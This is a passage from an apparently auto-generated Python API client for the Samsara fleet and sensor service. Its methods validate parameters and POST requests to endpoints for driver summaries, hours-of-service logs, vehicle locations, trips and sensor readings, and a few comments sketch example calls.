>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_summary(access_token, drivers_summary_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param DriversSummaryParam drivers_summary_param: Org ID and time range to query. (required)
:return: DriversSummaryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, **kwargs)
else:
(data) = self.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, **kwargs)
return data
def get_fleet_drivers_summary_with_http_info(self, access_token, drivers_summary_param, **kwargs):
"""
/fleet/drivers/summary
Get the distance and time each driver in an organization has driven in a given time period.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_drivers_summary_with_http_info(access_token, drivers_summary_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param DriversSummaryParam drivers_summary_param: Org ID and time range to query. (required)
:return: DriversSummaryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'drivers_summary_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_drivers_summary" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_drivers_summary`")
# verify the required parameter 'drivers_summary_param' is set
if ('drivers_summary_param' not in params) or (params['drivers_summary_param'] is None):
raise ValueError("Missing the required parameter `drivers_summary_param` when calling `get_fleet_drivers_summary`")
collection_formats = {}
resource_path = '/fleet/drivers/summary'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'drivers_summary_param' in params:
body_params = params['drivers_summary_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DriversSummaryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
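# Sketch of pulling the drivers summary. Per the docstring, DriversSummaryParam
# carries an org ID and a time range; its constructor arguments are left as `...`
# because the field names are defined by the generated model, not here.
#
#   from samsara.models import DriversSummaryParam       # assumed import path
#
#   summary = api.get_fleet_drivers_summary(access_token, DriversSummaryParam(...))
#   # Returns a DriversSummaryResponse with the distance and drive time per driver.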
def get_fleet_hos_authentication_logs(self, access_token, hos_authentication_logs_param, **kwargs):
"""
/fleet/hos_authentication_logs
Get the HOS (hours of service) sign-in and sign-out logs for the specified driver. Only sign-out logs include location information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_authentication_logs(access_token, hos_authentication_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosAuthenticationLogsParam hos_authentication_logs_param: (required)
:return: HosAuthenticationLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, **kwargs)
else:
(data) = self.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, **kwargs)
return data
def get_fleet_hos_authentication_logs_with_http_info(self, access_token, hos_authentication_logs_param, **kwargs):
"""
/fleet/hos_authentication_logs
Get the HOS (hours of service) sign-in and sign-out logs for the specified driver. Only sign-out logs include location information.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_authentication_logs_with_http_info(access_token, hos_authentication_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosAuthenticationLogsParam hos_authentication_logs_param: (required)
:return: HosAuthenticationLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'hos_authentication_logs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_hos_authentication_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_hos_authentication_logs`")
# verify the required parameter 'hos_authentication_logs_param' is set
if ('hos_authentication_logs_param' not in params) or (params['hos_authentication_logs_param'] is None):
raise ValueError("Missing the required parameter `hos_authentication_logs_param` when calling `get_fleet_hos_authentication_logs`")
collection_formats = {}
resource_path = '/fleet/hos_authentication_logs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'hos_authentication_logs_param' in params:
body_params = params['hos_authentication_logs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HosAuthenticationLogsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_hos_logs(self, access_token, hos_logs_param, **kwargs):
"""
/fleet/hos_logs
Get the HOS (hours of service) logs for the specified driver.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_logs(access_token, hos_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosLogsParam hos_logs_param: (required)
:return: HosLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, **kwargs)
else:
(data) = self.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, **kwargs)
return data
def get_fleet_hos_logs_with_http_info(self, access_token, hos_logs_param, **kwargs):
"""
/fleet/hos_logs
Get the HOS (hours of service) logs for the specified driver.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_hos_logs_with_http_info(access_token, hos_logs_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HosLogsParam hos_logs_param: (required)
:return: HosLogsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'hos_logs_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_hos_logs" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_hos_logs`")
# verify the required parameter 'hos_logs_param' is set
if ('hos_logs_param' not in params) or (params['hos_logs_param'] is None):
raise ValueError("Missing the required parameter `hos_logs_param` when calling `get_fleet_hos_logs`")
collection_formats = {}
resource_path = '/fleet/hos_logs'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'hos_logs_param' in params:
body_params = params['hos_logs_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HosLogsResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_locations(self, access_token, group_param, **kwargs):
"""
/fleet/locations
Get the current location of vehicles in a group. This method returns the current location, in latitude and longitude, of all vehicles in the requested group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_locations(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_locations_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_locations_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_locations_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/locations
Get the current location of vehicles in a group. This method returns the current location, in latitude and longitude, of all vehicles in the requested group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_locations_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_locations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_locations`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet_locations`")
collection_formats = {}
resource_path = '/fleet/locations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
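# Sketch of polling vehicle locations. The plain wrapper returns only the
# deserialized body; in this swagger-codegen layout, calling the *_with_http_info
# variant directly (without _return_http_data_only) typically also yields the HTTP
# status code and headers, though that detail depends on the ApiClient implementation.
#
#   from samsara.models import GroupParam                # assumed import path
#
#   locations = api.get_fleet_locations(access_token, GroupParam(group_id=101))  # illustrative group ID
#   # `locations` is an InlineResponse2002 carrying the latitude/longitude of each vehicle.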
def get_fleet_maintenance_list(self, access_token, group_param, **kwargs):
"""
/fleet/maintenance/list
Get a list of the vehicles with any engine faults or check-light data.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_maintenance_list(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_maintenance_list_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_fleet_maintenance_list_with_http_info(access_token, group_param, **kwargs)
return data
def get_fleet_maintenance_list_with_http_info(self, access_token, group_param, **kwargs):
"""
/fleet/maintenance/list
Get a list of the vehicles with any engine faults or check-light data.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_maintenance_list_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_maintenance_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_maintenance_list`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_fleet_maintenance_list`")
collection_formats = {}
resource_path = '/fleet/maintenance/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_fleet_trips(self, access_token, trips_param, **kwargs):
"""
/fleet/trips
Get historical trip data for a specified vehicle. This method returns a set of historical trip data for the specified vehicle in the specified time range.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_trips(access_token, trips_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param TripsParam trips_param: Group ID, vehicle ID and time range to query. (required)
:return: TripResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_fleet_trips_with_http_info(access_token, trips_param, **kwargs)
else:
(data) = self.get_fleet_trips_with_http_info(access_token, trips_param, **kwargs)
return data
def get_fleet_trips_with_http_info(self, access_token, trips_param, **kwargs):
"""
/fleet/trips
Get historical trip data for a specified vehicle. This method returns a set of historical trip data for the specified vehicle in the specified time range.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_fleet_trips_with_http_info(access_token, trips_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param TripsParam trips_param: Group ID, vehicle ID and time range to query. (required)
:return: TripResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'trips_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_fleet_trips" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_fleet_trips`")
# verify the required parameter 'trips_param' is set
if ('trips_param' not in params) or (params['trips_param'] is None):
raise ValueError("Missing the required parameter `trips_param` when calling `get_fleet_trips`")
collection_formats = {}
resource_path = '/fleet/trips'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'trips_param' in params:
body_params = params['trips_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TripResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
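# Sketch of fetching trips for one vehicle. TripsParam bundles the group ID,
# vehicle ID and time range (per its docstring); its field names are defined by
# the generated model and are not reproduced here.
#
#   from samsara.models import TripsParam                # assumed import path
#
#   trips = api.get_fleet_trips(access_token, TripsParam(...))   # group, vehicle, start/end per the model
#   # Returns a TripResponse covering the requested time range.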
def get_sensors(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_with_http_info(access_token, group_param, **kwargs)
else:
(data) = self.get_sensors_with_http_info(access_token, group_param, **kwargs)
return data
def get_sensors_with_http_info(self, access_token, group_param, **kwargs):
"""
/sensors/list
Get sensor objects. This method returns a list of the sensor objects in the Samsara Cloud and information about them.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_with_http_info(access_token, group_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param GroupParam group_param: Group ID to query. (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'group_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors`")
# verify the required parameter 'group_param' is set
if ('group_param' not in params) or (params['group_param'] is None):
raise ValueError("Missing the required parameter `group_param` when calling `get_sensors`")
collection_formats = {}
resource_path = '/sensors/list'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'group_param' in params:
body_params = params['group_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_history(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for the specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
else:
(data) = self.get_sensors_history_with_http_info(access_token, history_param, **kwargs)
return data
def get_sensors_history_with_http_info(self, access_token, history_param, **kwargs):
"""
/sensors/history
Get historical data for the specified sensors. This method returns a set of historical data for the specified sensors in the specified time range and at the specified time resolution.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_history_with_http_info(access_token, history_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param HistoryParam history_param: Group ID, time range and resolution, and list of sensor ID, field pairs to query. (required)
:return: SensorHistoryResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'history_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_history" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_history`")
# verify the required parameter 'history_param' is set
if ('history_param' not in params) or (params['history_param'] is None):
raise ValueError("Missing the required parameter `history_param` when calling `get_sensors_history`")
collection_formats = {}
resource_path = '/sensors/history'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'history_param' in params:
body_params = params['history_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SensorHistoryResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_humidity(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_humidity_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_humidity_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/humidity
Get humidity for requested sensors. This method returns the current relative humidity for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_humidity_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: HumidityResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_humidity" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_humidity`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_humidity`")
collection_formats = {}
resource_path = '/sensors/humidity'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'sensor_param' in params:
body_params = params['sensor_param']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='HumidityResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_sensors_temperature(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
else:
(data) = self.get_sensors_temperature_with_http_info(access_token, sensor_param, **kwargs)
return data
def get_sensors_temperature_with_http_info(self, access_token, sensor_param, **kwargs):
"""
/sensors/temperature
Get temperature for requested sensors. This method returns the current ambient temperature (and probe temperature if applicable) for the requested sensors.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_sensors_temperature_with_http_info(access_token, sensor_param, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str access_token: Samsara API access token. (required)
:param SensorParam sensor_param: Group ID and list of sensor IDs to query. (required)
:return: TemperatureResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['access_token', 'sensor_param']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_sensors_temperature" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'access_token' is set
if ('access_token' not in params) or (params['access_token'] is None):
raise ValueError("Missing the required parameter `access_token` when calling `get_sensors_temperature`")
# verify the required parameter 'sensor_param' is set
if ('sensor_param' not in params) or (params['sensor_param'] is None):
raise ValueError("Missing the required parameter `sensor_param` when calling `get_sensors_temperature`")
collection_formats = {}
resource_path = '/sensors/temperature'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'access_token' in params:
query_params['access_token'] = params['access_token']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
